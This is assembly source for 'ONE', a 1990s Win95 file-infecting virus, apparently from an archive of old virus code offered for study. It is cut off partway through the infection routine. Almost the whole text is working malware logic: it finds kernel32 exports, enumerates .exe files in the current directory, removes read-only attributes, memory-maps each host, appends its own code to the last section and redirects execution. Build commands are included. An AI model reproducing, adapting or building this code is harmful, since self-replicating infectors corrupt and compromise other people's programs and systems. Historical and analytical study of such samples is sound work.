one.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

;                      ONE V1.0b By JFK/SGWW
;
;
; ONE is not only my first Win95 virus, but also my first virus
; which I have released. I'm not really all that proud of it, 
; cause it didn't turn out at all to be what I had expected. But hey, 
; maybe next time :) Hmmm, this virus really has no chance of 
; spreading because it never moves out of its current directory.
; It's more or less just a learning experience.
;
; Features:
;   * File Mapping (though it's sorta pointless because off all
;                    the normal reads)
;   * Capable of infecting read only files.
;   * Only increases a files size if it has to.
;   * LOTS O' COMMENTS!!!! :-)
;
; Description:
;    One will look in the current directory for *.exe files until
;    it finds one that it should/can infect or until there are no
;    more exe files. When a exe file is found, One reads in the PE
;    header, and object table. One closes the file and looks for 
;    the next exe file if it determines the current file has already
;    been infected. If the file has not been infected, One figures
;    out all the new sizes of objects and stuff like that for the
;    host. One then maps the file to memory, fills in the new PE
;    header, object table, and appends the virus code to the end of
;    the last object. One then unmaps the file, and closes it which
;    automatically saves the changes made while mapped. One then 
;    starts all over looking for more *.exe files, if one is not found,
;    control is given to the host's original entry point.
;
; Notes:
;    * ONE will NOT work on WinNT
;    * First generations crash. (because OldEA is 0)
;    * Some code was taken from Mr. Klunky by DV8 and Yurn by Virogen.
;
; Greetz:
;    Dakota: Your web page looks pretty nice!
;    #virus & #vir (undernet): hiya :)
;    SGWW: Thanx for accepting me as one of you.
;    paw: Watch out pal, I've been practicing my trivia!
;    RAiD: alt.comp.virus.raid-vs-avers??? :)
;    Yesna: Did you forget your password on X? You never have ops! =)
;    Opic: Did you find any good BBS's yet!?!? heheh
;    LovinGod: You need a book on winsock bro! ;)
;    Virogen: Ok, so this is not exactly the kernel infector I was talking about.
;    Gloomy: ne ebi mozgi! :))))
;
; Assemble with:
;  tasm32 -ml -m5 -q -zn one.asm
;  tlink32 -Tpe -c -x -aa one,,, import32
;  pewrsec one.exe

.386p
.model  flat

include Win32API.inc

v_size     equ v_end - v_start        ;Virus absolute size in filez.


extrn      ExitProcess         :proc

.data
           db    ?                    ;Some dummy data so tlink32 dont yell.

.code
v_start:
           push  eax                        ;Save room for old Entry Point.
           pushad                           ;Save registers.
           add   esp, 36d                   ;ESP->After saved registers+4.

           call  OldTrick                   ;Get delta offset.
OldTrick:  pop   ebp
           sub   ebp, offset OldTrick       ;EBP = delta offset.
  
           mov   eax, [ebp+OldEA]           ;Address for return.
           push  eax                        ;Save it.
           sub   esp, 32d                   ;Fix stack.

           mov   eax, 15d
           mov   [ebp+lpfGetProcAddress], eax

findK32PEHeader:
           mov   edi, 0BFF6FFFFh            ;Will be inc'ed later
           mov   ecx, 00000300h             ;Scan this many bytes.
           mov   eax, 00004550h             ;Scan for "PE\0\0".

F_PE_I_Edi:
           inc   edi
Find_PE:
           repne scasb                    ;Repeat while not equal, scan byte.
           jne   RestoreHost                ;Bomb if not found.

           cmp   [edi-1], eax               ;Is this dword "PE/0/0"?
           jne   Find_PE                    ;Nope, continue scanning.
    
           dec   edi                        ;EDI was +1 off from Repne Scasb
           mov   bx, word ptr [edi+16h]     ;Get characteristics word.
           and   bx, 0F000h                 ;Unmask the bytes we need.
           cmp   bx, 2000h                  ;Is it 2000h (a DLL)?
           jne   F_PE_I_Edi        ;It's not a Dll, so it cant be the Kernel.

           mov   eax, [edi+34h]       ;EAX = Image Base (or Image Handle)
           mov   [ebp+K32Base], eax   ;Save Image base.
           mov   ebx, [edi+78h]       ;Get RVA of Export Table.
           add   ebx, [ebp+K32Base]   ;Add Base Address.
           mov   edi, [ebx+20h]       ;EDI=RVA Export Name Table Pointers.
           add   edi, [ebp+K32Base]   ;Add Base Address.

          ;Determine offset for unnamed functions.
           mov   ecx, [ebx+14h]             ;Number of functions...
           sub   ecx, [ebx+18h]             ;...less number of names...
           mov   eax, 4                     ;...times by four.
           mul   ecx                        ;Do it.
           mov   [ebp+UnnamedOffset], eax ;Save it.

          ;Calculate number of double words in string pointer array.
           mov   ecx, [ebx+18h]             ;Number of names...
           mov   eax, 4                     ;...times by four.
           mul   ecx                        ;Do it.
           xchg  ecx, eax                   ;CX=Num dwords.

           mov   edx, edi             ;Mul fucked up EDX,EDX=start of array.
                                       
CheckFunctionName:                      
           sub   ecx, 4                     ;Next name.
           mov   edi, edx                   ;Base address...
           add   edi, ecx                   ;...plus array index.
           mov   edi, [edi]                 ;Get RVA of name.
           add   edi, [ebp+K32Base]         ;Add base address.
                                              
           lea   esi, [ebp+lpfGetProcAddress]   ;GetProcAddress record.
           lea   eax, [ebp+lpfGetProcAddress]   ;Save entry point here.
           call  ExtractAbsoluteAddress     ;Check this name for it.
 
           cmp   ecx, 0                     ;Checked all the names?
           jne   CheckFunctionName          ;Nope. Check the next name.

           cmp   [ebp+lpfGetProcAddress], 00h   ;Did we get it?
           je    RestoreHost                ;Nope! :(
           
          ;Get all of our needed API offsets from memory.
           lea   esi, [ebp+ImportTable]     ;Start of stucture for offsets.
           mov   edx, esi                   ;Same.
GFO_NextChar:
           mov   bl,  [edx]                 ;bl = next char in table.
           cmp   bl,  0                     ;Is it 0?
           je    GFO_ItsZero                ;Yeah.
           cmp   bl,  '-'                   ;Is it the end of the table?
           je    After_GFO                  ;Yeah, continue.
           inc   edx                        ;Next char.
           jmp   GFO_NextChar               ;Loop.
GFO_ItsZero:
           inc   edx                        ;EDX -> where offset will go.
           mov   eax, esi                   ;EAX -> function name.
           push  edx                        ;Save EDX.
           call  MyGetProcAddress           ;Get this function's offset.
           jc    RestoreHost                ;Quit on fail.
           pop   edx                        ;Restore EDX.
           mov   [edx], eax                 ;Save offset.
           add   edx, 4                     ;EDX -> next functions name.
           mov   bl,  [edx]                 ;BL = first char of name.
           cmp   bl,  '-'                   ;Are we done yet?
           je    After_GFO                  ;Yep.
           mov   esi, edx                   ;ESI -> Next functions name.
           inc   edx                        ;Check next char.
           jmp   GFO_NextChar               ;Do it.
After_GFO:

          ;Look for FIRST *.exe file.
           lea   eax, [ebp+FoundFileData]   ;Where to store results.
           push  eax
           lea   eax, [ebp+lpsExeFiles]     ;Name of files to look for.
           push  eax
           call  [ebp+lpfFindFirstFileA]    ;Direct API call.
;On return, if a file with the name is found, eax = the handle,
;otherwise eax=FFFFFFFF
           cmp   eax, 0FFFFFFFFh            ;No file found?
           je    RestoreHost                ;No more exe files in this folder.
           mov   [ebp+FoundFileHandle], eax ;Save handle.

MainLoop:  
           call  ReadInPEHeader             ;Read in the files PE header.
           cmp   ebx, 0                     ;Did we fail?
           je    FindNextFile               ;Next file on failure.

           call  SetNOAttribs               ;Remove files attributes.
           jc    FindNextFile               ;Couldnt set attributes.

           call  OpenFile                   ;Open the file.
           jc    FindNextFile               ;Couldnt open file.

           call  MapFile                    ;Map this file into memory
           jc    MapFailed                  ;Couldn't map file.

           call  InfectFile                 ;Infect it.

           push  dword ptr [ebp+MapBaseAddr]
           call  [ebp+lpfUnmapViewOfFile]   ;Unmap this file from memory.

MapFailed:
           call  CloseFile                  ;Close the file.

           call  RestoreAttribs             ;Restore the original attributes.
          

FindNextFile:
           lea   eax, [ebp+FoundFileData]   ;Where to store results.
           push  eax
           push  dword ptr [ebp + offset FoundFileHandle] 
                                            ;Handle from previous searches.
           call  [ebp+lpfFindNextFileA]     ;Do it.
           or    eax, eax                   ;Success?
           jnz   MainLoop                   ;Yes, Continue search.

RestoreHost:          
           popad
           ret

;***********************
;****** Functions ******
;***********************

;**** InfectFile ****

InfectFile PROC
          ;Append virus code to end of last object.
           mov   edx, [ebp+OldPhysSize]       ;Physical size of object.
           add   edx, [esi+20d]               ;Physical offset of object.
           add   edx, [ebp+MapBaseAddr]       ;Plus of mapped object.